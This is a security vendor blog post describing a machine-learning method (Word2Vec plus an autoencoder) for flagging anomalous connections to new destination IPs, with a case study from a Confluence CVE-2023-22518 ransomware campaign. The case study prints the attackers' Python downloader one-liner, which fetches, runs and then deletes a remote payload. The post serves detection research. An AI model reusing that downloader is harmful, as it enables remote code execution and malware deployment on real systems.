Written by

Ido Sakazi

Ido Sakazi is a Data Scientist and Senior Security Researcher at Akamai, focusing on cyber and network security data science projects. His expertise is in leveraging advanced data analysis and machine learning techniques to detect and mitigate potential threats.

Written by

Yonatan Gilvarg

Yonatan Gilvarg is a Senior Security Researcher on the Akamai Hunt Team. His areas of expertise include threat detection and research, big data anomaly detection, and incident response.

Introduction

Securing enterprise network traffic is crucial in the fight against threat actors who are trying to harm organizations and cause irreparable damage. The identification of new and potentially malicious destination IPs plays a key role in this defense — you can’t protect what you don’t know needs to be protected.

The ability to detect anomalous connections to these previously unseen destination IPs is a powerful tool, providing administrators with insights and warnings about potential threats.

Our focus on previously unseen destination IPs stems from the recognition that threat actors frequently exploit these new IP addresses to bypass traditional security measures, making it essential to prioritize detection efforts accordingly.

In this blog post, we present a machine learning method that detects anomalous connections to new destination IPs accessed from nodes in an organization’s network. The method is built on the connections’ metadata. We use the Word2Vec algorithm to represent the features associated with destination IPs and then apply an autoencoder as the final step.

We used this method in a real-world campaign and it led to a successful detection. Suspicious IP addresses are potentially involved in malicious activities — such as command and control (C2) servers, botnets, and phishing domains — so quick detection can be the difference between an alert and an incident.

Identifying a suspicious new destination IP is challenging

We encountered several challenges in our effort to detect and mitigate threats posed by new unseen destination IPs. Because these IPs lack prior reputation or historical data, traditional detection methods are ineffective. Their novelty makes it challenging to distinguish benign first-time communications from malicious ones, as they can resemble everyday traffic patterns.

We found that analyzing the sequence of the source process, destination port, autonomous system number (ASN), and geolocation linked to the destination IP addressed these challenges. Doing so gave us deeper insight into the context of network traffic and significantly improved our ability to identify and flag suspicious new destination IPs.

Anomaly detection

Our methodology uses machine learning techniques that fit the unique challenges of anomaly detection in network traffic. We gather diverse network traffic metadata, including source processes, destination ports, ASNs, geolocations, and more. A thorough analysis requires this variety of data, and the raw values must be categorized before the model can produce useful output.

We categorize and group the source process and destination port based on their respective roles for easier analysis. For example, we consolidate the standard ports of different Structured Query Language (SQL) servers (such as MSSQL 1433 and MySQL 3306) into a single category: SQL server.
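The grouping step can be pictured with a small lookup table. The sketch below is only an illustration: the two SQL entries come from the example above, while the "web" entries, the "other" fallback, and the function name port_role are assumptions made for this example and not the actual categories used in production.

```python
# Illustrative port-to-role table. Only the two SQL entries come from the text;
# everything else is an assumption added for the example.
PORT_ROLES = {
    1433: "sql_server",  # MSSQL (from the article)
    3306: "sql_server",  # MySQL (from the article)
    80: "web",           # assumed category
    443: "web",          # assumed category
}


def port_role(port: int) -> str:
    """Map a raw destination port to a coarse role, or "other" if unknown."""
    return PORT_ROLES.get(port, "other")


print(port_role(1433), port_role(3306), port_role(9999))
```

Collapsing raw values this way keeps the vocabulary small, so connections that play the same role share a token even when their port numbers differ.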

Using machine learning for anomaly detection

We apply the Word2Vec algorithm to capture the semantic similarities between different IPs based on their context in the network traffic. Word2Vec, which was originally developed for natural language processing, learns vector representations by analyzing the context in which elements appear.

In our approach, we model sequences of network metadata as input to the algorithm, allowing it to learn meaningful embeddings that reflect behavioral relationships across the network. This enables more effective anomaly detection and pattern recognition.
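One way to picture this input is as a list of short "sentences," one per connection, where each "word" is a metadata value. The sketch below assumes a hypothetical record layout (the field names process, port_role, asn, and geo, and the name=value token format are ours, not taken from the production pipeline) and uses documentation-reserved IP addresses and ASNs.

```python
from typing import Dict, List

# Hypothetical field order for one connection; the article names these
# metadata types but not the exact encoding.
FIELDS = ("process", "port_role", "asn", "geo")


def connection_to_tokens(conn: Dict[str, str]) -> List[str]:
    """Turn one connection record into an ordered list of string tokens."""
    return [f"{name}={conn[name]}" for name in FIELDS]


# Made-up records using documentation-reserved IPs and ASNs.
connections = [
    {"dst_ip": "192.0.2.10", "process": "browser", "port_role": "web",
     "asn": "AS64500", "geo": "US"},
    {"dst_ip": "198.51.100.7", "process": "db_client", "port_role": "sql_server",
     "asn": "AS64501", "geo": "DE"},
]

# Each inner list plays the role of a sentence for a Word2Vec-style model.
corpus = [connection_to_tokens(c) for c in connections]
print(corpus[0])
```

Lists of string tokens like these are the shape that common Word2Vec implementations accept as training sentences.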

By representing IPs as high-dimensional vectors, we enable the algorithm to identify patterns of IPs that frequently appear together in network traffic. IPs that are clustered closely in vector space have strong contextual relationships, while outliers or anomalies are positioned farther away. This approach offers valuable insights into the structure and dynamics of the network traffic.
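Closeness in vector space is often measured with cosine similarity. The following sketch uses three made-up three-dimensional vectors in place of learned embeddings. Real embeddings would have many more dimensions, and the article does not state which distance measure is used, so cosine similarity is an assumption here.

```python
import math
from typing import Sequence


def cosine_similarity(a: Sequence[float], b: Sequence[float]) -> float:
    """Cosine of the angle between two vectors (0.0 if either has zero length)."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    if norm_a == 0 or norm_b == 0:
        return 0.0
    return dot / (norm_a * norm_b)


# Made-up embeddings: two IPs seen in similar contexts and one seen elsewhere.
ip_a = [0.9, 0.1, 0.0]
ip_b = [0.8, 0.2, 0.1]
ip_odd = [-0.1, 0.2, 0.9]

print(cosine_similarity(ip_a, ip_b))    # close to 1: similar context
print(cosine_similarity(ip_a, ip_odd))  # much lower: different context
```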

In the final stage of our methodology, we use an autoencoder — a type of artificial neural network designed for unsupervised learning that aims to compress and reconstruct input data efficiently. The autoencoder allows us to detect anomalies in network traffic without relying on labeled training data. This enables our algorithm to adapt to evolving threat scenarios and detect novel attack patterns effectively.

The embedding features are fed into the autoencoder, enabling it to learn and reconstruct normal network traffic patterns (Figure 1). Connections with high reconstruction errors are flagged as potential malicious activity.
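To make the idea of reconstruction error concrete, here is a deliberately tiny sketch: a linear autoencoder with a single-number bottleneck and tied encoder/decoder weights, trained with plain gradient descent on made-up three-dimensional "embeddings." This is a toy under stated assumptions, not the architecture used in our method, which the article does not detail. All names, data, and hyperparameters are illustrative.

```python
from typing import List, Sequence

Vector = Sequence[float]


def reconstruct(w: List[float], x: Vector) -> List[float]:
    """Encode x to one number (w . x), then decode it with the same weights."""
    code = sum(wi * xi for wi, xi in zip(w, x))
    return [wi * code for wi in w]


def reconstruction_error(w: List[float], x: Vector) -> float:
    """Mean squared error between x and its reconstruction."""
    x_hat = reconstruct(w, x)
    return sum((xi - hi) ** 2 for xi, hi in zip(x, x_hat)) / len(x)


def train(data: Sequence[Vector], epochs: int = 500, lr: float = 0.02) -> List[float]:
    """Fit the tied weights with per-sample gradient descent."""
    w = [0.5] * len(data[0])  # fixed starting point so the run is reproducible
    for _ in range(epochs):
        for x in data:
            code = sum(wi * xi for wi, xi in zip(w, x))
            residual = [xi - wi * code for xi, wi in zip(x, w)]
            w_dot_r = sum(wi * ri for wi, ri in zip(w, residual))
            # Gradient of ||x - w (w . x)||^2 with respect to w is
            # -2 * (code * residual + (w . residual) * x); step against it.
            w = [wi + 2 * lr * (code * ri + w_dot_r * xi)
                 for wi, ri, xi in zip(w, residual, x)]
    return w


# Made-up "normal" embeddings that share one dominant pattern.
normal_embeddings = [
    [1.0, 1.0, 0.0],
    [0.9, 1.1, 0.0],
    [1.1, 0.9, 0.0],
    [1.0, 1.0, 0.1],
    [1.2, 1.2, 0.0],
]
# A made-up connection that does not follow that pattern.
new_connection = [0.0, 0.0, 1.5]

weights = train(normal_embeddings)
normal_errors = [reconstruction_error(weights, x) for x in normal_embeddings]
outlier_error = reconstruction_error(weights, new_connection)
print(max(normal_errors), outlier_error)
```

Because the bottleneck can only retain the pattern shared by the training data, inputs that follow that pattern are rebuilt almost exactly, while an input that does not follow it is rebuilt poorly and stands out with a large error.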

Anomaly validation

A core tenet of this methodology is continuous review and learning. By applying our algorithm daily, we can review all new destination IPs and check each connection to them for anomalies that may indicate malicious behavior.
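Selecting the day's new destinations can be sketched as a set difference against everything seen so far. The function name, the in-memory history set, and the sample addresses (from documentation-reserved ranges) are assumptions for illustration; a production system would likely keep this history in a data store.

```python
from typing import Iterable, Set


def new_destination_ips(todays_ips: Iterable[str], seen_before: Set[str]) -> Set[str]:
    """Return the destinations contacted today that were never seen before."""
    return set(todays_ips) - seen_before


history = {"192.0.2.10", "198.51.100.7"}
today = ["192.0.2.10", "203.0.113.99", "203.0.113.99"]

fresh = new_destination_ips(today, history)
print(fresh)

# After review, today's new destinations become part of the history.
history |= fresh
```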

Figure 2 is a real example of a daily output for a customer. There were 462 new destination IPs in that single day.

The horizontal red line represents the threshold for flagging a connection as anomalous. Any connection that results in a reconstruction error above this line would be considered suspicious.
The blue dots signify those IPs that our system determined to be benign, as they displayed low reconstruction errors and matched the expected pattern of network behavior.
The orange dot represents a single IP that our analysis flagged as anomalous due to its high reconstruction error.
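The flagging rule described for the figure amounts to a simple comparison against the threshold. In the sketch below, the error values, the threshold of 0.5, and the IP addresses are made up for illustration. The article does not state the real threshold or how it was chosen.

```python
from typing import Dict


def flag_anomalies(errors: Dict[str, float], threshold: float) -> Dict[str, float]:
    """Keep only destinations whose reconstruction error is above the threshold."""
    return {ip: err for ip, err in errors.items() if err > threshold}


# Made-up reconstruction errors for one day's new destination IPs.
daily_errors = {
    "192.0.2.10": 0.02,
    "198.51.100.7": 0.05,
    "203.0.113.99": 0.81,
}
THRESHOLD = 0.5  # hypothetical value standing in for the red line

flagged = flag_anomalies(daily_errors, THRESHOLD)
print(flagged)
```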

The anomaly was subsequently investigated and confirmed to be part of an attack campaign, underscoring the robustness and importance of our detection mechanisms. The next section includes the details of the attack.

How our algorithm successfully detected an attack in a customer environment

A new methodology is great in theory, but it must be practical to be truly valuable. We chose to run our algorithm against a previously detected attack, which was part of a known Confluence campaign exploiting the CVE-2023-22518 vulnerability. This attack led to remote code execution and the deployment of ransomware.

In this case, the initial exploitation allowed attackers unauthorized access to the server. They established a connection to a command and control (C2) server via Python and downloaded a malicious file named qnetd (Figure 3).

python3 -c import os,sys,time import platform as p if sys.version_info.major == 3: import urllib.request as u else: import urllib2 as u h = /tmp/lru d = ./qnetd ml = {3x:[i386,i686], 6x:[x86_64,amd64], 3a:[arm], 6a:[aarch64]} try: m = p.machine().lower() if os.popen(id -u).read().strip() == 0: try: os.chdir(/var) except: os.chdir(/tmp) else: os.chdir(/tmp) for l in open(h): for k,al in ml.items(): for a in al: if a == m: l = l+.+k r = u.urlopen(l) with open(d, wb) as f: f.write(r.read()) f.flush() r.close() os.system(chmod +x +d) os.system(chmod 755 +d) os.system(d +  > /dev/null 2>&1 &) time.sleep(5) os.remove(d) os.remove(h) except: if os.path.exists(h): os.remove(h) if os.path.exists(d): os.remove(d) pass

Fig. 3: Malicious Python command identified in the investigation

We observed two servers communicating with the malicious IP address, which was part of the widespread Atlassian Confluence CVE-2023-22518 campaign. The connections came from both the Python and qnetd processes, and our method flagged them because the geolocation was anomalous (Figure 4).

Enabling the proactive identification of suspicious network connections

Detecting anomalous network connections to new destination IPs is a critical aspect of enterprise cybersecurity. By leveraging Word2Vec and autoencoder techniques, our approach analyzes network traffic metadata such as source processes, destination ports, and geolocation to identify potential security threats that might bypass traditional detection methods.

In a real-world case study, our method successfully uncovered a sophisticated attack that was exploiting a Confluence vulnerability (CVE-2023-22518), which demonstrated the method’s effectiveness in detecting a malicious IP that was part of a ransomware deployment campaign.

The technique will enable organizations to proactively identify suspicious network connections by learning and flagging deviations from normal traffic patterns.

Find out more

To learn more about our managed threat hunting service, visit our Akamai Hunt web page.

Sep 30, 2025

Ido Sakazi and Yonatan Gilvarg

How to Secure Enterprise Networks by Identifying Malicious IP Addresses
